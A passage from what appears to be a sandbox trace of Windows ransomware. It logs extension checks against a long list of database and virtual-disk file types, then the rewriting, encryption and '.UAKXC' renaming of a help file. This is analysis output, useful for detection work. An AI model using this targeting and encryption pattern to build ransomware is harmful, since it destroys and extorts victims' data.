(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.960] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.961] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.962] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.963] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.964] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.965] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.966] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.967] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.968] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.968] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.968] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.969] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.969] SetEndOfFile (hFile=0x6c4) returned 1 [0140.969] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.969] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x15e, lpOverlapped=0x0) returned 1 [0140.969] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.969] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x15e, lpOverlapped=0x0) returned 1 [0140.969] CloseHandle (hObject=0x6c4) returned 1 [0140.971] GetProcessHeap () returned 0xea0000 [0140.971] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.971] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" [0140.971] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.UAKXC" [0140.971] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn.uakxc")) returned 1 [0140.972] GetProcessHeap () returned 0xea0000 [0140.972] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.972] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeed10 | out: hHeap=0xea0000) returned 1 [0140.972] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2560 | out: hHeap=0xea0000) returned 1 [0140.972] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0140.972] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0140.972] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0140.973] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn")) returned 0x2022 [0140.973] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0140.973] GetLastError () returned 0x0 [0140.974] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=332) returned 1 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.974] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn", 